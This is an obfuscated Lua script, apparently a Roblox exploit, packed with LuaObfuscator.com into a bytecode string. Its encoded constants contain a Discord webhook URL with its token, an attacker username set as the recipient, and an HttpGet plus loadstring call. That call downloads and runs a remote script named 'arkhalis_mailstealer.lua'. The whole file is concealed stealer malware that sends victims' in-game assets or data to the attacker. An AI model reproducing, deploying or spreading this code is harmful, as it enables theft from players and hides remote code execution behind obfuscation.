--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -(555 + (941 -(282 + 595)))))) + (932 -((2494 -(1523 + 114)) + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(929 -(214 + 713))^(v32-(1 + 0 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 -0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1068 -(68 + 997)) );v19=v19 + (1274 -(226 + 1044)) ;return (v37 * 16777216) + (v36 * ((285487 -(32 + 85)) -219834)) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=(1905 -(1881 + 24))) then else v39=0;v40=nil;v38=1;end if ((2 -1)==v38) then v41=nil;v42=nil;v38=2;end if (v38~=(1766 -(454 + 1309))) then else v45=nil;v46=nil;v38=2 + 2 ;end if (v38==(5 -1)) then while true do if (v39~=2) then else local v97=0 -0 ;local v98;while true do if (0==v97) then v98=0 -0 ;while true do if (v98~=(286 -(134 + 151))) then else v39=1668 -(970 + 695) ;break;end if (0==v98) then v44=nil;v45=nil;v98=1 -0 ;end end break;end end end if (v39==(1991 -(582 + 1408))) then local v99=0;while true do if (v99~=0) then else v42=nil;v43=nil;v99=1;end if (v99~=(3 -2)) then else v39=2;break;end end end if (v39==0) then local v100=0 -0 ;while true do if (v100==(0 -0)) then v40=1824 -(1195 + 629) ;v41=nil;v100=1;end if (v100==(1 -0)) then v39=1;break;end end end if (v39==(244 -(187 + 54))) then v46=nil;while true do local v101=0;local v102;while true do if (v101==0) then v102=780 -(162 + 618) ;while true do if (v102==(1 + 0)) then if (0==v40) then local v116=0;local v117;while true do if (v116~=0) then else v117=0;while true do if (v117~=(0 + 0)) then else local v161=0;while true do if (1~=v161) then else v117=1;break;end if (v161==(0 -0)) then v41={};v42={};v161=1 -0 ;end end end if (v117==1) then local v162=0;local v163;while true do if ((0 + 0)==v162) then v163=0;while true do if (v163~=(1636 -(1373 + 263))) then else local v169=1000 -(451 + 549) ;while true do if (v169==(0 + 0)) then v43={};v44={v41,v42,nil,v43};v169=1 -0 ;end if (v169~=1) then else v163=1385 -(746 + 638) ;break;end end end if (v163==(1 + 0)) then v117=2;break;end end break;end end end if (v117==(2 -0)) then v40=342 -(218 + 123) ;break;end end break;end end end break;end if (v102~=(1581 -(1535 + 46))) then else local v103=0;while true do if (v103==(0 + 0)) then if (v40~=2) then else local v152=0;local v153;local v154;while true do if (v152~=(1 + 0)) then else while true do if (v153==(560 -(306 + 254))) then v154=0 + 0 ;while true do local v167=0;local v168;while true do if (0~=v167) then else v168=0;while true do if (v168~=(0 -0)) then else if (v154==0) then local v176=1467 -(899 + 568) ;while true do if (v176~=1) then else v154=1 + 0 ;break;end if (v176==(0 -0)) then for v177=604 -(268 + 335) ,v24() do local v178=290 -(60 + 230) ;local v179;local v180;while true do if (v178==0) then v179=0;v180=nil;v178=573 -(426 + 146) ;end if (v178==1) then while true do if (v179==(0 + 0)) then v180=v22();if (v21(v180,1,1)==0) then local v185=0;local v186;local v187;local v188;local v189;local v190;while true do if (v185~=2) then else v190=nil;while true do if (v186==0) then v187=1456 -(282 + 1174) ;v188=nil;v186=1;end if (v186==1) then local v191=811 -(569 + 242) ;while true do if (0==v191) then v189=nil;v190=nil;v191=1;end if (v191~=(2 -1)) then else v186=2;break;end end end if (v186==2) then while true do if (3~=v187) then else if (v21(v189,1 + 2 ,1027 -(706 + 318) )==(1252 -(721 + 530))) then v190[1275 -(945 + 326) ]=v46[v190[4]];end v41[v177]=v190;break;end if (v187~=0) then else local v193=0;while true do if ((0 -0)~=v193) then else v188=v21(v180,2 + 0 ,703 -(271 + 429) );v189=v21(v180,4,6);v193=1 + 0 ;end if (v193~=1) then else v187=1;break;end end end if (1==v187) then local v194=0;while true do if (v194==(1501 -(1408 + 92))) then v187=1088 -(461 + 625) ;break;end if (0==v194) then v190={v23(),v23(),nil,nil};if (v188==0) then local v199=0;local v200;local v201;while true do if (v199~=(0 + 0)) then else v200=0;v201=nil;v199=1 + 0 ;end if (v199~=1) then else while true do if (v200==0) then v201=0;while true do if (v201==(0 + 0)) then v190[532 -(406 + 123) ]=v23();v190[1773 -(1749 + 20) ]=v23();break;end end break;end end break;end end elseif (v188==1) then v190[1 + 2 ]=v24();elseif (v188==(1324 -(1249 + 73))) then v190[2 + 1 ]=v24() -((1147 -(466 + 679))^(38 -22)) ;elseif (v188==3) then local v205=0;while true do if (v205==0) then v190[8 -5 ]=v24() -((1902 -(106 + 1794))^16) ;v190[2 + 2 ]=v23();break;end end end v194=1;end end end if (v187==(1 + 1)) then local v195=0 -0 ;local v196;while true do if (v195==0) then v196=0 -0 ;while true do if (v196==(114 -(4 + 110))) then local v202=0;while true do if ((584 -(57 + 527))==v202) then if (v21(v189,1,1428 -(41 + 1386) )==(104 -(17 + 86))) then v190[2 + 0 ]=v46[v190[3 -1 ]];end if (v21(v189,5 -3 ,168 -(122 + 44) )~=(1 -0)) then else v190[9 -6 ]=v46[v190[3 + 0 ]];end v202=1 + 0 ;end if (v202~=(1 -0)) then else v196=66 -(30 + 35) ;break;end end end if (v196==1) then v187=3;break;end end break;end end end end break;end end break;end if (v185~=0) then else v186=0 + 0 ;v187=nil;v185=1;end if (v185==(1258 -(1043 + 214))) then v188=nil;v189=nil;v185=2;end end end break;end end break;end end end for v181=1,v24() do v42[v181-(3 -2) ]=v29();end v176=1;end end end if (v154==1) then return v44;end break;end end break;end end end break;end end break;end if (v152==0) then v153=0;v154=nil;v152=1;end end end if (1~=v40) then else local v155=0;local v156;while true do if (0==v155) then v156=1212 -(323 + 889) ;while true do if (1==v156) then local v164=0 -0 ;local v165;while true do if ((580 -(361 + 219))~=v164) then else v165=0;while true do if (v165==(320 -(53 + 267))) then for v171=1,v45 do local v172=0;local v173;local v174;local v175;while true do if (v172==1) then v175=nil;while true do if (v173~=0) then else local v183=0;while true do if (1==v183) then v173=1 + 0 ;break;end if (v183==(413 -(15 + 398))) then v174=v22();v175=nil;v183=983 -(18 + 964) ;end end end if (v173==1) then if (v174==(3 -2)) then v175=v22()~=0 ;elseif (v174==(2 + 0)) then v175=v25();elseif (v174==(2 + 1)) then v175=v26();end v46[v171]=v175;break;end end break;end if (v172~=(850 -(20 + 830))) then else v173=0 + 0 ;v174=nil;v172=127 -(116 + 10) ;end end end v44[3]=v22();v165=1;end if (v165==1) then v156=1 + 1 ;break;end end break;end end end if (0==v156) then local v166=738 -(542 + 196) ;while true do if (v166~=(0 -0)) then else v45=v24();v46={};v166=1 + 0 ;end if (v166==1) then v156=1 + 0 ;break;end end end if (v156==2) then v40=1 + 1 ;break;end end break;end end end v103=1;end if (1~=v103) then else v102=1;break;end end end end break;end end end break;end end break;end if (v38==(4 -2)) then v43=nil;v44=nil;v38=3;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=2 -1 ;local v50=(v21(v48,1552 -(1126 + 425) ,6 + 14 ) * ((407 -(118 + 287))^(154 -122))) + v47 ;local v51=v21(v48,82 -(397 -(144 + 192)) ,1152 -((356 -(64 + 174)) + 1003) );local v52=((v21(v48,5 + 27 )==(2 -1)) and  -(378 -(142 + 235))) or (4 -3) ;if (v51==((216 -(42 + 174)) + (0 -0))) then if (v50==(0 + 0 + 0)) then return v52 * (977 -(553 + 424)) ;else local v89=0 -0 ;while true do if (v89==(0 + 0)) then v51=1 + 0 ;v49=731 -(395 + 81 + 255) ;break;end end end elseif (v51==(1192 + 855)) then return ((v50==(0 + 0 + 0)) and (v52 * ((1 -0)/0))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/((2 + 0)^((1616 -(363 + 1141)) -60)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(1580 -(1183 + 397))) then return "";end end v54=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;local v55={};for v67=2 -1 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=0 + (0 -0) ;local v57;while true do if (v56==(1 + 0)) then return v57;end if (v56==(1975 -(1913 + 62))) then v57=v1(v16,v19,v19);v19=v19 + 1 ;v56=1 + 0 ;end end end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (1935 -(565 + 1368)) );v19=v19 + 2 ;return (v59 * (962 -706)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v60,1,1));return "";end end else local v86=v2(v0(v60,16));if v20 then local v90=v5(v86,v20);v20=nil;return v90;else return v86;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v88=0;while true do if (v88==1) then if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82>0) then v79[v81[2]][v81[3]]=v81[4];elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=2) then local v106=0;local v107;while true do if (v106==0) then v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));break;end end elseif (v82==3) then v79[v81[2]]=v81[3];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=7) then if (v82<=5) then v79[v81[2]]();elseif (v82==6) then v79[v81[2]]=v63[v81[3]];else local v125=v81[2];v79[v125]=v79[v125](v13(v79,v125 + 1 ,v74));end elseif (v82<=8) then do return;end elseif (v82==9) then v73=v81[3];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=15) then if (v82<=12) then if (v82>11) then v79[v81[2]]=v81[3];else local v110=v81[2];local v111=v79[v81[3]];v79[v110 + 1 ]=v111;v79[v110]=v111[v81[4]];end elseif (v82<=13) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>14) then local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==1) then v74=(v134 + v132) -1 ;v135=0;v131=2;end if (v131==0) then v132=v81[2];v133,v134=v72(v79[v132](v13(v79,v132 + 1 ,v81[3])));v131=1;end if (v131==2) then for v158=v132,v74 do v135=v135 + 1 ;v79[v158]=v133[v135];end break;end end else v73=v81[3];end elseif (v82<=18) then if (v82<=16) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>17) then v79[v81[2]]=v81[3]~=0 ;else local v138=v81[2];local v139,v140=v72(v79[v138](v13(v79,v138 + 1 ,v81[3])));v74=(v140 + v138) -1 ;local v141=0;for v149=v138,v74 do v141=v141 + 1 ;v79[v149]=v139[v141];end end elseif (v82<=19) then v79[v81[2]]();elseif (v82==20) then do return;end else local v142=v81[2];local v143=v79[v81[3]];v79[v142 + 1 ]=v143;v79[v142]=v143[v81[4]];end v73=v73 + 1 ;break;end if (0==v88) then v81=v69[v73];v82=v81[1];v88=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3136393435322O37353330362O373337392F5F59503858433859684D7951584D686E737768754E4A456879734B545139785F49354233644A6B51764D74765735464C58464D32754B354D7761424F434C686156796152030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D653103083O006368756F70615F3803093O00557365726E616D653200173O0012033O00013O00264O000E0001000200040E3O000E000100120A000100033O00300100010004000500120A000100063O00120A000200073O00200B000200020008001203000400094O0010000500014O000F000200054O000200013O00022O000500010001000100040E3O0016000100264O00010001000100040E3O0001000100120A000100033O0030010001000A000B00120A000100033O0030010001000C000B0012033O00023O00040E3O000100012O00143O00017O00",v9(),...);end
